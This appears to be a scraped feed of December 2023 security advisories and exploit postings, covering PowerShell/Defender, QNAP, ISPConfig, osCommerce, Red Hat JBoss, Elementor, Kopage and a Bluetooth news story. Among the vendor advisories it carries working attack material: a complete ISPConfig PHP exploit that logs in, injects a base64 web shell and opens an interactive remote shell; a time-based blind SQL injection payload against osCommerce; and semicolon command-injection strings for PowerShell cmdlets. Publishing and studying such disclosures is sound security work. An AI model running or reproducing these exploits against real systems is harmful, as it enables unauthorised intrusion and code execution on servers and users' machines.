Microsoft Defender API and PowerShell APIs suffer from an arbitrary code execution due to a flaw in powershell not handling user provided input that contains a semicolon.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt[+] twitter.com/hyp3rlinx[+] x.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows PowerShell[Vulnerability Type]Arbitrary Code Execution[CVE Reference]N/A[Security Issue]Microsoft Defender Anti Malware and or PS API's can result in executing arbitrary code.E.g. scan a directory, shortcut .lnk or even non-existent item, may execute unintended code.This vector builds upon my previous advisory and subsequent project PSTrojanFile.Requirements:1) On CL 'powershell' cmd is prefixed or passed in by calling PowerShell from another script2) Executable file of same name as the parameter that lives nearbyExamples:powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads\;saps Helper;.1.zip"(Helper.exe lives on Desktop)Create directory  ";saps Test", Test.exe, Test.cmd etc is on same CL pathpowershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test"Create directory with semicolon, drop PE file named doom.exe in same path.powershell Set-ProcessMitigation -PolicyFilePath  "test;saps doom"TODO: Update PSTrojanFile[References]http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txthttps://github.com/hyp3rlinx/PSTrojanFilehttps://packetstormsecurity.com/files/153863/Microsoft-Windows-PowerShell-Command-Execution.htmlhttps://www.exploit-db.com/exploits/47248https://github.com/MicrosoftDocs/windows-powershell-docs/tree/main/docset/winserver2019-ps/defender[Video PoC URL]https://www.youtube.com/watch?v=0Go6yJiRWP8[Network Access]Remote [Severity]High[Disclosure Timeline]Vendor Notification:  circa (2019)December 7, 2023 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Microsoft Defender Anti-Malware PowerShell API Arbitrary Code Execution

An OS command injection vulnerability has been found to affect legacy QNAP VioStor NVR models running QVR Firmware 4.x. If exploited, the vulnerability could allow authenticated users to execute commands via a network.

We have already fixed the vulnerability in the following versions:

QVR Firmware 5.0.0 and later



Security ID : QSA-23-48

*   Release date : December 9, 2023
    
*   CVE identifier : CVE-2023-47565
    
*   Affected products: QVR Firmware 4.x
    

**Summary**

An OS command injection vulnerability has been found to affect legacy QNAP VioStor NVR models running QVR Firmware 4.x. If exploited, the vulnerability could allow authenticated users to execute commands via a network.

We have already fixed the vulnerability in QVR Firmware 5.0.0 on June 21, 2014:

Affected Product

Fixed Version

QVR Firmware 4.x

QVR Firmware 5.x and later

**Recommendation**

To mitigate the vulnerability, ensure you apply strong passwords for all user accounts.

To further secure your device, we highly recommend updating QVR to the latest version.

**Changing User Passwords in QVR**

1.  Log on to QVR.
2.  Go to **Control Panel > Privilege > Users**.
3.  Identify the user you want to edit.  
    **Note:** Only administrators can change the passwords of other users.
4.  Click the **Change Password** icon.
5.  Specify a new, strong password.
6.  Verify the password.
7.  Click **Apply**.

**Updating QVR Firmware**

1.  Log on to QVR as an administrator.
2.  Go to **Control Panel > System Settings > Firmware Update**.
3.  Select the **Firmware Update** tab.
4.  Click **Browse...** to upload the latest firmware file.  
    **Tip:** Download the latest firmware file for your specific model from https://www.qnap.com/go/download. Select "Legacy NVR" to locate your model.
5.  Click **Update System**.  
    QVR installs the update.

**Attachment**

*   CVE-2023-47565.json

**Acknowledgements:** Chad Seaman and Larry Cashdollar of Akamai Technologies reported this vulnerability to CISA.

**Revision History:**  
V1.0 (December 09, 2023) - Published

CVE-2023-47565: Vulnerability Affecting Legacy VioStor NVR - Security Advisory

A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.

We have already fixed the vulnerability in the following versions:
QTS 5.0.1.2514 build 20230906 and later
QTS 5.1.2.2533 build 20230926 and later
QuTS hero h5.0.1.2515 build 20230907 and later
QuTS hero h5.1.2.2534 build 20230927 and later


Security ID : QSA-23-07

*   Release date : December 9, 2023
    
*   CVE identifier : CVE-2023-32968 | CVE-2023-32975
    
*   Affected products: QTS 5.1.x, 5.0.x; QuTS hero h5.1.x, h5.0.x
    

**Summary**

Two buffer copy without checking size of input vulnerabilities have been reported to affect several QNAP operating system versions. If exploited, these vulnerabilities could allow authenticated administrators to execute code via a network.

We have already fixed the vulnerabilities in the following versions:

Affected Product

Fixed Version

QTS 5.1.x

QTS 5.1.2.2533 build 20230926 and later

QTS 5.0.x

QTS 5.0.1.2514 build 20230906 and later

QuTS hero h5.1.x

QuTS hero h5.1.2.2534 build 20230927 and later

QuTS hero h5.0.x

QuTS hero h5.0.1.2515 build 20230907 and later

Please check this security advisory regularly for updates and promptly update your operating system to the latest recommended version as soon as it is available.

**Recommendation**

To secure your device, we recommend regularly updating your system to the latest version to benefit from vulnerability fixes. You can check the product support status to see the latest updates available to your NAS model.

**Updating QTS, QuTS hero, or QuTScloud**

1.  Log in to QTS, QuTS hero, or QuTScloud as an administrator.
2.  Go to **Control Panel** > **System** > **Firmware Update**.
3.  Under **Live Update**, click **Check for Update**.  
    The system downloads and installs the latest available update.

**Tip:** You can also download the update from the QNAP website. Go to **Support** > **Download Center** and then perform a manual update for your specific device.

**Attachment**

*   CVE-2023-32968.json
*   CVE-2023-32975.json

**Acknowledgements:** Jiaxu Zhao && Bingwei Peng

**Revision History:**  
V1.0 (December 09, 2023) - Published

CVE-2023-32975: Multiple Vulnerabilities in QTS and QuTS hero - Security Advisory

ISPConfig versions 4.2.11 and below suffer from a PHP code injection vulnerability in language_edit.php.

------------------------------------------------------------------------  
ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability  
------------------------------------------------------------------------

[-] Software Link:

https://www.ispconfig.org

[-] Affected Versions:

Version 3.2.11 and prior versions.

[-] Vulnerabilities Description:

User input passed through the "records" POST parameter to  
/admin/language_edit.php is not properly sanitized before being used  
to dynamically generate PHP code that will be executed by the  
application. This can be exploited by malicious administrator users to  
inject and execute arbitrary PHP code on the web server.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-46818.php  
(Packet Storm Editor Note: See bottom of this file for PoC)

[-] Solution:

Upgrade to version 3.2.11p1 or later.

[-] Disclosure Timeline:

[25/10/2023] - Vendor notified  
[26/10/2023] - Version 3.2.11p1 released  
[27/10/2023] - CVE identifier assigned  
[07/12/2023] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-46818 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-13

[-] Other References:

https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/

--- CVE-2023-46818.php PoC ---

<?php

/*  
    ------------------------------------------------------------------------  
    ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability  
    ------------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX  
    mail................: n0b0d13s[at]gmail[dot]com  
    software link.......: https://www.ispconfig.org

    +-------------------------------------------------------------------------+  
    | This proof of concept code was written for educational purpose only.    |  
    | Use it at your own risk. Author will be not responsible for any damage. |  
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    User input passed through the "records" POST parameter to /admin/language_edit.php is  
    not properly sanitized before being used to dynamically generate PHP code that will be  
    executed by the application. This can be exploited by malicious administrator users to  
    inject and execute arbitrary PHP code on the web server.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2023-13  
*/

set_time_limit(0);  
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Username> <Password>\n\n");

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

@unlink('./cookies.txt');

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "{$url}login/");  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');  
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".urlencode($user)."&password=".urlencode($pass)."&s_mod=login");

if (preg_match('/Username or Password wrong/i', curl_exec($ch))) die("[-] Login failed!\n");

print "[+] Injecting shell\n";

$__phpcode = base64_encode("<?php print('____'); passthru(base64_decode(\$_SERVER['HTTP_C'])); print('____'); ?>");  
$injection = "'];file_put_contents('sh.php',base64_decode('{$__phpcode}'));die;#";  
$lang_file = str_shuffle("qwertyuioplkjhgfdsazxcvbnm").".lng";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/language_edit.php");  
curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}");

$res = curl_exec($ch);

if (!preg_match('/_csrf_id" value="([^"]+)"/i', $res, $csrf_id)) die("[-] CSRF ID not found!\n");  
if (!preg_match('/_csrf_key" value="([^"]+)"/i', $res, $csrf_key)) die("[-] CSRF key not found!\n");

curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}&_csrf_id={$csrf_id[1]}&_csrf_key={$csrf_key[1]}&records[%5C]=".urlencode($injection));

curl_exec($ch);

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/sh.php");  
curl_setopt($ch, CURLOPT_POST, false);

while(1)  
{  
    print "\nispconfig-shell# ";  
    if (($cmd = trim(fgets(STDIN))) == "exit") break;  
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]);  
    preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");  
}

ISPConfig 3.2.11 PHP Code Injection

osCommerce version 4 suffers from a remote SQL injection vulnerability.

    # Exploit Title: osCommerce 4 - SQL Injection# Exploit Author: CraCkEr# Date: 22/11/2023# Vendor: osCommerce ltd.# Vendor Homepage: https://www.oscommerce.com/# Software Link: https://demo.oscommerce.com/# Demo Link: https://demo.oscommerce.com/b2b-supermarket/# Tested on: Windows 11 Home# Impact: Database Access# CWE: CWE-89 - CWE-74 - CWE-707# CVE: CVE-2023-6579# VDB: VDB-247160## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /b2b-supermarket/shopping-cartPOST Parameter 'estimate[country_id]' is vulnerable to SQLi---Parameter: estimate[country_id] (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: estimate[country_id]=223'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&estimate[post_code]=900001&estimate[shipping]=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw==----------------------------------------------POST /b2b-supermarket/shopping-cart HTTP/2estimate%5Bcountry_id%5D=[SQLi]&estimate%5Bpost_code%5D=900001&estimate%5Bshipping%5D=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw%3D%3D-------------------------------------------[-] Done

osCommerce 4 SQL Injection

Red Hat Security Advisory 2023-7623-03 - Red Hat JBoss Web Server 5.7.7 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include denial of service and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7623.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat JBoss Web Server 5.7.7 release and security updateAdvisory ID:        RHSA-2023:7623-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7623Issue date:         2023-12-07Revision:           03CVE Names:          CVE-2023-0464====================================================================Summary: Red Hat JBoss Web Server 5.7.7 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.7 serves as a replacement for Red Hat JBoss Web Server 5.7.6. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* jbcs-httpd24-openssl: OpenSSL: Excessive time spent checking DH q parametervalue (CVE-2023-3817)* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)* openssl: Certificate policy check not enabled (CVE-2023-0466)* openssl: Invalid certificate policies in leaf certificates are silentlyignored (CVE-2023-0465)* openssl: Denial of service by excessive resource usage in verifying X509policy constraints (CVE-2023-0464)* tomcat: FileUpload: DoS due to accumulation of temporary files on Windows(CVE-2023-42794)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* openssl: Possible DoS translating ASN.1 object identifiers (CVE-2023-2650)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-0464References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2181082https://bugzilla.redhat.com/show_bug.cgi?id=2182561https://bugzilla.redhat.com/show_bug.cgi?id=2182565https://bugzilla.redhat.com/show_bug.cgi?id=2207947https://bugzilla.redhat.com/show_bug.cgi?id=2224962https://bugzilla.redhat.com/show_bug.cgi?id=2227852https://bugzilla.redhat.com/show_bug.cgi?id=2235370

Red Hat Security Advisory 2023-7623-03

Red Hat Security Advisory 2023-7622-03 - An update is now available for Red Hat JBoss Web Server 5.7.7 on Red Hat Enterprise Linux versions 7, 8, and 9. Issues addressed include denial of service and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7622.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat JBoss Web Server 5.7.7 release and security updateAdvisory ID:        RHSA-2023:7622-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7622Issue date:         2023-12-07Revision:           03CVE Names:          CVE-2023-0464====================================================================Summary: An update is now available for Red Hat JBoss Web Server 5.7.7 on Red Hat Enterprise Linux versions 7, 8, and 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.7 serves as a replacement for Red Hat JBoss Web Server 5.7.6. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes linked to in the References section.Security Fix(es):* jbcs-httpd24-openssl: OpenSSL: Excessive time spent checking DH q parameter value (CVE-2023-3817)* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)* openssl: Certificate policy check not enabled (CVE-2023-0466)* openssl: Invalid certificate policies in leaf certificates are silently ignored (CVE-2023-0465)* openssl: Denial of service by excessive resource usage in verifying X509 policy constraints (CVE-2023-0464)* openssl: Possible DoS translating ASN.1 object identifiers (CVE-2023-2650)* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-0464References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2181082https://bugzilla.redhat.com/show_bug.cgi?id=2182561https://bugzilla.redhat.com/show_bug.cgi?id=2182565https://bugzilla.redhat.com/show_bug.cgi?id=2207947https://bugzilla.redhat.com/show_bug.cgi?id=2224962https://bugzilla.redhat.com/show_bug.cgi?id=2227852https://bugzilla.redhat.com/show_bug.cgi?id=2235370

Red Hat Security Advisory 2023-7622-03

WordPress Elementor plugin versions 3.18.1 and below are vulnerability to remote code execution via file upload in the template import functionality.

    Vulnerability Summary from Wordfence IntelligenceDescription: Elementor <= 3.18.1 Authenticated(Contributor+) Arbitrary File Upload to Remote Code Execution via Template Import Affected Plugin: ElementorPlugin Slug: elementorAffected Versions: <= 3.18.1CVE ID: CVE-2023-48777Pending CVSS Score: 8.8 (Highl)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HResearcher/s: Hồng Quân Fully Patched Version: 3.18.2The Elementor Website Builder plugin for WordPress is vulnerable to Remote Code Execution via file upload in all versions up to and including 3.18.1 via the template import functionality. This makes it possible for authenticated attackers, with contributor-level access and above, to upload files and execute code on the server. Technical Analysis The source of the issue is the handle_elementor_upload function called by the import_template Elementor AJAX function, which is accessible to Contributor-level users and above. Although it uses file type validation, vulnerable versions first save the uploaded file to a temporary directory before checking the file type, and do not delete the temporary file if it fails this validation:public function handle_elementor_upload( array $file, $allowed_file_extensions = null{// If $file['fileData'] is set, it signals that the passed file is a Base64 string that needs to be decoded and// saved to a temporary file.if ( isset( $file['fileData']) {$file = $this->save_base64_to_tmp_file( $file );}$validation_result = $this->validate_file( $file, $allowed_file_extensions );if ( is_wp_error( $validation_result) {return $validation_result;}return $file;}This means that contributors with access to the Elementor editor could upload files of any type and they will be saved in a temporary directory with a randomized name. While attackers exploiting versions before 3.18.1 could use directory traversal to move the uploaded file into a more predictable location, the 3.18.1 partial patch sanitized the filename, meaning that it could only be uploaded directly to the temporary directory.Since the exploit returns a 500 error and provides no feedback on the location of the temporary directory, attackers would have difficulty finding the uploaded file unless directory indexing was enabled on the server, which is no longer common due to the many security risks it presents.ConclusionIn today's PSA, we covered a file upload vulnerability in Elementor affecting versions 3.18.1 and earlier. We strongly recommend updating to the latest version of Elementor, which is 3.18.2 as of this writing, as soon as possible, as this is a high-severity vulnerability which can be used by attackers to upload files and take control of a site.All Wordfence users, including those running Wordfence Premium , Wordfence Care , and Wordfence Response,  are fully protected against this vulnerability.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.Did you know that Wordfence has a Bug Bounty Program ? We’ve recently increased our bounties by 6.25x until December 20th, 2023, with our bounties for the most critical vulnerabilities reaching $10,000 USD! If you’re an aspiring or current vulnerability researcher, click here to sign up.

WordPress Elementor 3.18.1 File Upload / Remote Code Execution

Kopage Website Builder version 4.4.15 appears to suffer from a remote shell upload vulnerability.

    ## Title: Kopage-Website-Builder-4.4.15-File-Upload-RCE## Author: nu11secur1ty## Date: 12/08/2023## Vendor: https://www.kopage.com/## Software: https://demo.kopage.com/index.php## Reference: https://portswigger.net/web-security/file-upload,https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload## Description:The file upload function suffers from file upload vulnerability, thereis no strong sanitizing function for uploading some extension files.In this case, I uploaded an HTML web socket client on their server andthen I connected this client with my javascript server =)Depending on the scenario, this can be the end of privacy and evenworse than ever!I am a Penetration Tester, not a stupid cracker! Thank you all!STATUS: CRITICAL Vulnerability[+]Exploit client:```POST<html>  <script>(() => {  const ws = new WebSocket('ws://0.0.0.0:8080')  ws.onopen = () => {    console.log('ws opened on browser')    ws.send('hello world you are hacked :D')  }  ws.onmessage = (message) => {    console.log(`message received ${message}`)  }})() </script></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kopage.com/Kopage-Website-Builder-4.4.15)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/12/kopage-website-builder-4415-file-upload.html)## Time spent:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Kopage Website Builder 4.4.15 Shell Upload

By Waqas
Another day, another Bluetooth vulnerability impacting billions of devices worldwide!
This is a post from HackRead.com Read the original post: Bluetooth Vulnerability Enables Keystroke Injection on Android, Linux, macOS, iOS

Keystroke injection is a method wherein malicious commands or keystrokes are remotely injected into a system to compromise or manipulate its functionality, often exploited for unauthorized access or control.

A critical vulnerability in Bluetooth allows attackers to take control of Android, Linux, macOS, and iOS devices, including devices in Lockdown Mode. This vulnerability is tracked as **CVE-2023-45866** and disclosed by security researcher Marc Newlin. 

It enables attackers to connect to vulnerable devices without user confirmation and inject keystrokes, potentially allowing them to install malicious apps, run arbitrary commands, and perform other unauthorized actions (except those requiring password/biometric authentication). The software vendors were notified about the flaw in August 2023.

This vulnerability was first identified in 2016 in non-Bluetooth wireless mice and keyboards. Back then, it was assumed that Bluetooth was secure and promoted as a better alternative to vulnerable custom protocols.

In 2023, a challenge forced Newlin to focus on Apple’s Magic Keyboard due to its **reliance on Bluetooth** and Apple’s security reputation. Initial research revealed limited information about Bluetooth, macOS, and iOS, necessitating extensive learning. 

Later, unauthenticated Bluetooth keystroke injection vulnerabilities in macOS and iOS were discovered, which were exploitable even when **Lockdown Mode** was enabled. Similar flaws were identified in Linux and Android, suggesting a broader issue beyond individual implementations. The Bluetooth HID specification analysis revealed a combination of protocol design and implementation bugs.

Newlin explained in his **post on GitHub** that multiple Bluetooth stacks had authentication bypass vulnerabilities. The attack exploits an “unauthenticated pairing mechanism” defined within the Bluetooth specification, tricking the target device into accepting a fake keyboard.

This deception allows an attacker in close proximity to connect and inject keystrokes, potentially enabling them to install apps and execute arbitrary commands. It is worth noting that unpatched devices are vulnerable under specific conditions, such as:

*   Android: Bluetooth must be enabled.
*   Linux/BlueZ: Bluetooth must be discoverable/connectable.
*   iOS/macOS: Bluetooth must be enabled, and a Magic Keyboard must be paired with the device.

These vulnerabilities can be exploited with a standard Bluetooth adapter on a Linux computer. Notably, some vulnerabilities predate “**MouseJack**“, affecting Android devices as far back as version 4.2.2 (released in 2012). 

In a comment to Hackread.com, Ken Dunham, Director of Cyber Threat at Qualys said “The two new Bluetooth vulnerabilities that exist for Android, Linux, MacOS, and iOS enable unauthorized attackers to perform an “unauthenticated pairing”, then possibly enable execution of code and to run arbitrary commands.”

“Bluetooth attacks are limited to close physical proximity. As a workaround, users of vulnerable systems can limit their attack surface and risk until patched by disabling Bluetooth,” Dunham advised.

While a fix for the Linux vulnerability existed since 2020 (**CVE-2020-0556**), it was surprisingly left disabled by default. Despite announcements by major Linux distributions, only ChromeOS is known to have implemented the fix. The latest BlueZ patch for CVE-2023-45866 finally enables this crucial fix by default.

It is a serious vulnerability impacting a vast array of devices, exposing potential security risks inherent to Bluetooth technology. However, according to Google, “fixes for these issues that affect Android 11 through 14 are available to impacted OEMs. All currently-supported Pixel devices will receive this fix via December OTA updates.”

1.  **BlueRepli attack bypasses Bluetooth authentication on Android**
2.  **BleedingTooth Bluetooth vulnerability allows RCE in Linux devices**
3.  **Update your devices: New Bluetooth flaw lets attackers monitor traffic**
4.  **BlueBorne Bluetooth Flaw Affects Millions of Smartphones, IoT and PCs**
5.  **Hackers can crash Google’s Nest Dropcams by exploiting Bluetooth flaws**

Tag

#auth